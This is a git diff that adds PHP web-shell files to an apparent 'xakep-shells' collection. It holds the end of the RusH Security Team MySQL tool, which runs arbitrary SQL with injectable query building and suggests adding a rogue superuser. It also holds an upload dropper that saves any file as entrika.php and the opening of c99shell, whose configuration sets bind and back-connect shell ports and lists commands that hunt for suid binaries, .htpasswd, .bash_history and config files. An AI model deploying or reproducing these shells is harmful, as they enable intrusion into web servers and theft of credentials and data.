+if (isset($HTTP_GET_VARS['query_tbl']) || $HTTP_GET_VARS['q_tbl']=='table') { 
+  print $form_query_db_tbl."<br>"; 
+}
+
+
+if (isset($new_query_tbl)) {
+   $new_query_tbl=trim($new_query_tbl);
+   print $form_query_db_tbl;
+
+
+   $result_tbl = mysql_query($new_query_tbl) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if ($result_tbl !=='') {
+      print " 
+      <table align=center border=0 width=90% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr>";
+      if ($php_kod=='ok') { print "<font color=green><b>PHP-êîä çàïðîñà:</b></font><br>\$sql = \"$new_query_tbl\";<br><br>"; }
+      if (preg_match("[drop]",$new_query)) { print "Òàáëèöà óäàëåíà, îáíîâèòå ñïèñîê òàáëèö áàçû."; }
+
+      print "<br><b>Çàïðîñ óñïåøíî âûïîëíåí</b><br>";
+      /*ïîëó÷àåì íàçâàíèÿ ñòîëáöîâ*/
+      for ($i=0;$i<@mysql_num_fields($result_tbl);$i++){
+           $name_tbl=mysql_field_name($result_tbl,$i);
+           print "<td bgcolor=#C7C5C5>$name_tbl</td>";   
+      } 
+
+      print "</tr>";
+      while ($line_tbl = @mysql_fetch_array($result_tbl, MYSQL_ASSOC)) {
+         print "<tr>";
+         foreach ($line_tbl as $key_tbl =>$col_value_tbl) {          
+             print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_tbl)."</td>";
+         }
+         print "</tr>";
+      }
+      print "</table><br>";
+      @mysql_free_result($result_tbl);
+   }
+}
+
+/*-------------ïîêàçàòü ñòðîêè òàáëèöû--------------*/
+if (!isset($alter_table) && !isset($st_tab) && !isset($query_tbl) && !isset($new_query_tbl) && 
+!isset($dump) && !isset($strukt) && !isset($query_edit) && !isset($query_del) && !isset($q_GET) && 
+!isset($nn_row) && !isset($nn) && !isset($upd_f)) {
+  print "<br><table border=0 cellpadding=1 cellspacing=1 width=100% bgcolor=#FFFFFF><tr>";
+
+//îïðåäåëÿåì èíäåêñ äëÿ òàáëèöû, ïî êàêîìó ïîëþ(ïîëÿì) áóäåì èñêàòü ðåäàêòèðóåìóþ çàïèñü
+//Key_name Èìÿ èíäåêñà, Column_name Èìÿ ñòîëáöà
+$query_ind = 'SHOW KEYS FROM '.$tbl;
+$result_ind = mysql_query($query_ind) or die("$h_error<b>".mysql_error()."</b>$f_error");
+
+while ($row = mysql_fetch_array($result_ind, MYSQL_ASSOC)) {
+    if ($row['Key_name'] == 'PRIMARY') {
+        $primary[] .= $row['Column_name'];
+    } 
+}
+ 
+mysql_free_result($result_ind);
+
+ $query = "SELECT * FROM $tbl LIMIT $limit_start,$limit_count";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+if (mysql_num_rows($result) == 0) {
+  print "Òàáëèöà <b>$tbl</b> íå ñîäåðæèò íè îäíîé çàïèñè";
+}else{
+  /*ïîëó÷àåì íàçâàíèÿ ñòîëáöîâ*/
+  print "<td bgcolor=#E6E7E9></td><td bgcolor=#E6E7E9></td>";
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+    $name=mysql_field_name($result,$i);
+    print "<td bgcolor=#C7C5C5>$name</td>";   
+  } 
+}
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+     print "</tr>";
+
+     foreach ($line as $key =>$col_value) {
+
+         if (count($primary) > 0) { 
+           if (in_array($key,$primary)) { $edit .= urlencode("`$key`='$col_value' AND "); } 
+         } 
+         else {
+            //if (strlen($col_value) >= 20) { 
+            //   $e_count=substr($col_value,0,20);
+            //   $edit .= urlencode("`$key`='$e_count' AND ");
+            //} else {
+               $edit .= urlencode("`$key`='$col_value' AND ");
+            //}
+            
+         } 
+
+        $string .= "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value)."</td>";
+     }
+       $edit=substr_replace($edit,"",-5); //îòáðîñèòü ïîñëåäíèé +AND+
+       print "<tr><td bgcolor=#97C8D4 width=25><a href=$self?query_edit=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"Ðåäàêòèðîâàòü çíà÷åíèÿ êîëîíîê\">Edit</a></td>".
+             "<td bgcolor=#F84C6C width=25><a href=$self?query_del=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"Óäàëèòü çàïèñü\" onClick=\"return confirm('Óäàëèòü çàïèñü, óâåðåíû ?')\";>Del</a></td>".
+             $string."</tr>";
+    
+       unset($edit);
+       unset($string);
+  }
+
+  mysql_free_result($result);
+  print "</table><br>";
+}
+
+//óäàëÿåì çàïèñü
+if (isset($query_del)) {
+ $query = 'DELETE FROM '.$tbl.' WHERE '.urldecode($query_del);
+ $r_del = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ print "Óñïåøíî óäàëåíî ñòðîê (<b> ".mysql_affected_rows()."</b> )";
+
+}
+
+//âûâîäèì ôîðìó ðåäàêòèðîâàíèÿ ñòðîêè
+if (isset($query_edit)) {
+ $query = 'SELECT * FROM '.$tbl.' WHERE '.urldecode($query_edit);
+ $r_edit = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+
+
+print "<br><center><font color=green><h5>Ðåäàêòèðîâàíèå çíà÷åíèé ïîëåé òàáëèöû</h5></font></center>".
+      "<table border=0 cellpadding=1 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#C7C5C5>".
+      "<td align=center><b>Ïîëå</b></td><td align=center><b>Çíà÷åíèå</b></td></tr>";
+print   "<form method=\"GET\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"q_GET\" value=\"y\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">";
+     print "<input type=\"radio\" name=\"up_str\" value=\"up_ok\" checked=\"checked\">Îáíîâèòü çíà÷åíèÿ&nbsp;&nbsp;<b>ÈËÈ</b>&nbsp;&nbsp;&nbsp;".
+           "<input type=\"radio\" name=\"up_str\" value=\"ins_ok\">Âñòàâèòü íîâûé ðÿä<br><br>";
+
+  while ($line = mysql_fetch_array($r_edit, MYSQL_ASSOC)) {
+     foreach ($line as $key =>$col_value) {
+        $del_str_ñ .= "`$key`='$col_value' AND ";
+        $len_value=strlen($col_value);
+        if ($len_value > 40) { $t_value="<textarea name=$key cols=39 rows=5>$col_value</textarea>"; }
+        else { $t_value="<input type='text' name='$key' value='$col_value'size=40>"; }
+        $g_query .= "<tr><td bgcolor=#DBDCDD><b>$key</b></td><td>$t_value</td></tr>";
+     }
+  }
+     $del_str=urlencode($del_str_ñ);
+     print "<input type=\"hidden\" name=\"del_str\" value=\"$del_str\">";
+     print "$g_query</table><br>";
+     print "<br><input type=submit value=\"èçìåíèòü çíà÷åíèå\"></form>";
+}
+
+if (isset($q_GET)) {
+  $url=$HTTP_SERVER_VARS['QUERY_STRING'];
+  if ($HTTP_GET_VARS['up_str']=='up_ok') {
+     $del_str=urldecode(substr_replace($del_str,"",-5));
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $q_a .= "`".$q[0]."`='".$q[1]."', ";
+     }
+     $q_a_ins=urldecode(substr_replace($q_a,"",-2));
+     $q_st=urldecode(substr_replace($q_st,"",-2));
+     //÷òî çàìåíÿåì $del_str 
+     //íà ÷òî áóäåì ìåíÿòü $q_a_ins
+
+     $up="UPDATE `$tbl` SET $q_a_ins WHERE $del_str LIMIT 1";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-êîä çàïðîñà:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>Èçìåíåíî ñòðîê</font> (<b>$c_a_r<b>)</td></tr></table>";
+  }
+  if ($HTTP_GET_VARS['up_str']=='ins_ok') {
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $i_cols .="`$q[0]`, ";
+        $i_val .= "'$q[1]', ";
+     }
+     $i_cols=urldecode(substr_replace($i_cols,"",-2)); //êîëîíêè
+     $q_a_ins=urldecode(substr_replace($i_val,"",-2)); //çíà÷åíèÿ
+     $up="INSERT INTO `$tbl` ($i_cols) VALUES ($q_a_ins)";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-êîä çàïðîñà:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>Èçìåíåíî ñòðîê</font> (<b>$c_a_r<b>)</td></tr></table>";
+    
+  }
+}
+
+/*------------Âñòàâèòü ðÿä--------------*/
+if (isset($nn_row) && $HTTP_GET_VARS['nn_row']=='ok') {
+ $nn_q = 'SHOW FIELDS FROM '.$tbl;
+ $r_n = mysql_query($nn_q) or die("$h_error<b>".mysql_error()."</b>$f_error");
+print   "<form method=\"GET\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"nn\" value=\"ok\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+        "<br><center><font size=2>Âñòàâèòü íîâûé ðÿä â òàáëèöó [ <b>$tbl</b> ]</font></center>".        
+        "<br><table border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#DAD9D9>".
+        "<td align=center><b>Ïîëå</b></td><td align=center><b>Òèï</b></td>".
+        "<td align=center><b>Çíà÷åíèå</b></td></tr>";
+  while ($n_line = mysql_fetch_array($r_n, MYSQL_ASSOC)) {
+     foreach ($n_line as $n_k =>$n_v) {
+        $pole .= "$n_v ";
+     }
+       $n_l=explode(" ",$pole);
+       print "<tr bgcolor=#EDEEF1><td>&nbsp;<b>$n_l[0]</b>&nbsp;</td><td bgcolor=#E7E7D7>&nbsp;".
+              wordwrap($n_l[1],40,"<br>",1).
+              "&nbsp;</td><td><input type=text name=\"$n_l[0]\" size=35><td></tr>";             
+       unset($pole); 
+  }
+  print "</table><br><center><input type=submit value=\"âñòàâèòü íîâûé ðÿä\"></center></form><br>";
+}
+
+if (isset($nn) && $HTTP_GET_VARS['nn']=='ok') {
+     $url_n=urldecode($HTTP_SERVER_VARS['QUERY_STRING']);
+     $b_nn = explode('&', $url_n);
+     for ($i = 8; $i < count($b_nn); $i++) {
+        $q_nn = explode("=",$b_nn[$i]);
+          $q_a_nn .= "`".$q_nn[0]."` ,";        
+          $q_nn_v .= "'".$q_nn[1]."' ,";
+     }
+
+     $q_nn_ins=urldecode(substr_replace($q_a_nn,"",-2));
+     $q_nn_v=substr_replace($q_nn_v,"",-2);
+     $sql_n="INSERT INTO `$tbl` ( $q_nn_ins ) VALUES ( $q_nn_v )";
+     mysql_query($sql_n) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_n_r=mysql_affected_rows();
+     print "&nbsp;&nbsp;&nbsp;<table align=left width=70% bgcolor=#D7D8DA>".
+           "<tr><td><b>Action:</b> <font color=green>Óñïåøíî âñòàâëåíî ñòðîê</font> (<b>$c_n_r<b>)</td></tr>".
+           "<tr><td><font color=green><b>PHP-êîä çàïðîñà:</b></font></td></tr><tr><td>\$sql=\"$sql_n\";</td></tr></table><br><br>";
+}
+
+/*-----------dump òàáëèöû------------*/
+$form_dump=
+"<form method=\"GET\" action=\"$self\">".
+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
+"<table bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump òàáëèöû</b> [ <font color=green><b>$tbl</b></font> ]</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"t_strukt\"> Òîëüêî ñòðóêòóðó</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d\"> Òîëüêî äàííûå</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d_strukt\" checked=\"checked\"> Ñòðóêòóðó è äàííûå</td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>Äåéñòâèå</b> (ïîêàçàòü/îòïðàâèòü)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> Ïîêàçàòü â áðîóçåðå</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> Îòïðàâèòü ôàéë äàìïà ïî HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($dump=="tab"){ print $form_dump;}
+/*----------Òîëüêî ñòðóêòóðà------------*/
+
+if ($HTTP_GET_VARS['strukt']=='t_strukt' && $HTTP_GET_VARS['send']=='send_br' ){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp); 
+   $dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+
+unlink($file);
+}
+
+/*----------Ñòðóêòóðà è äàííûå------------*/
+if ($HTTP_GET_VARS['strukt']=='d_strukt' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n # MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+
+/*----------Òîëüêî äàííûå------------*/
+if ($HTTP_GET_VARS['strukt']=='d' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+/*-------------END! ïîêàçàòü ñòðîêè òàáëèöû--------------*/
+
+print "
+   </td>
+ </tr>
+</table>
+           </td>
+         </tr>
+       </table>";
+}
+
+/*------------------------ END R I G H T   B L O C K ! -----------------------*/
+/*èíôîðìàöèÿ php*/
+if (isset($php) && $php=='ok'){
+phpinfo();
+}
+if (isset($q_help) && $q_help=='ok'){
+ print 'Ìèíè HELP ïî çàïðîñàì
+ <li><b>SHOW TABLES </b> âûâîäèò ñïèñîê òàáëèö áàçû
+ <li><b>SHOW OPEN TABLES</b> âûâîäèò ñïèñîê òàáëèö, êîòîðûå â íàñòîÿùèé ìîìåíò îòêðûòû â êýøå òàáëèöû
+ <li><b>SHOW TABLE STATUS</b> ñòðóêòóðà òàáëèö áàçû
+ <li><b>SELECT VERSION(), CURRENT_DATE</b> âûâîäèò âåðñèþ MySQL ñåðâåðà è òåêóùóþ äàòó
+ <li><b>SELECT (2*2), (4+1)*5, (9/3), (5-3)</b> èñïîëüçóåì MySQL êàê êàëüêóëÿòîð: óêàçûâàåì ÷åðåç çàïÿòóþ àðèôìåòè÷åñêèå îïåðàöèè
+ <li><b>DROP TABLE IF EXISTS table_name</b> óäàëèòü òàáëèöó \"table_name\"
+ <li><b>CREATE TABLE bar (m INT)</b> ñîçäàòü òàáëèöó bar ñ îäíèì ñòîëáöîì (m) òèïà integer
+ <li><b>CREATE TABLE test (number INTEGER,texts CHAR(10));</b> ñîçäàòü òàáëèöó test ñ ïîëÿìè number -òèï INTEGER è ïîëå texts -òèï CHAR
+ <li><b>CREATE TABLE `test` SELECT * FROM `rush`;</b> ñîçäàòü òàáëèöó test ,êîïèðóÿ òàáëèöó rush
+ <li><b>ALTER TABLE test CHANGE SITE OLD_SITE INTEGER</b> ïåðåèìåíîâàòü ñòîëáåö INTEGER èç SITE â OLD_SITE
+ <li><b>ALTER TABLE test RENAME rush</b> ïåðåèìåíîâàòü òàáëèöó test â rush
+ <li><b>UPDATE mysql.user SET Password=PASSWORD(\'new_passwd\') WHERE user=\'root\'</b> ñìåíèòü þçåðó root ïàðîëü
+ <li><b>FLUSH PRIVILEGES</b> ïåðå÷èòàòü òàáëèöó ïðèâèëåãèé þçåðîâ
+ <li><b>GRANT ALL PRIVILEGES ON *.* TO rst@localhost IDENTIFIED BY \'some_pass\' WITH GRANT OPTION</b> äîáàâèòü íîâîãî ñóïåð-þçåðà mysql <b>rst</b> ñ ïàðîëåì <b>some_pass</b>
+ ';
+
+}
+
+print "
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+?>
diff --git a/xakep-shells/PHP/uploader.php.php.txt b/xakep-shells/PHP/uploader.php.php.txt
new file mode 100644
index 0000000..f2f2179
--- /dev/null
+++ b/xakep-shells/PHP/uploader.php.php.txt
@@ -0,0 +1,9 @@
+<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
+<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
+Send this file: <INPUT NAME="userfile" TYPE="file">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<?
+move_uploaded_file($userfile, "entrika.php"); 
+?>
+
diff --git a/xakep-shells/PHP/w.php.php.txt b/xakep-shells/PHP/w.php.php.txt
new file mode 100644
index 0000000..cd63ef0
--- /dev/null
+++ b/xakep-shells/PHP/w.php.php.txt
@@ -0,0 +1,2653 @@
+<?php
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 pre-release build #17"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
+
+$gzipencode = TRUE; //Encode with gzip?
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>donated_html</b></center>";
+/* If you publish free shell and you wish
+add link to your site or any other information,
+put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "prozente@gmail.com"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
